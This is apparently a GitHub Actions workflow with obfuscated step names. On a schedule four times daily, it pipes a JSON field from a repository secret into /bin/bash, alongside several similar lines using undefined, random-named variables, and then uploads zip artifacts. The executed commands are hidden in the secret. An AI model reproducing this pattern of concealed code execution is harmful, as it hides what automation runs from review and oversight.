name: hengchaobeigong
on:
  workflow_dispatch:

  schedule:
    - cron: '40 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hengchaobeigong
        env:
          s7: ${{ secrets.s7 }}
        run: |
          printf '%s' "$s7" | jq -r .b893 | /bin/bash
          echo $smdby2 | jq -r .u2058 | /bin/bash
          printf '%s' "$eoa448" | jq -r .dgvkc3693 | /bin/bash
          echo $guvdm871 | jq -r .gqslp0 | /bin/bash
          printf '%s' "$rka8" | jq -r .qiehf91844 | /bin/bash
          echo $zfpu725 | jq -r .sg49 | /bin/bash
          printf '%s' "$v08167" | jq -r .jo7 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 4bMfPJD4
          path: "*.zip"
          retention-days: 1
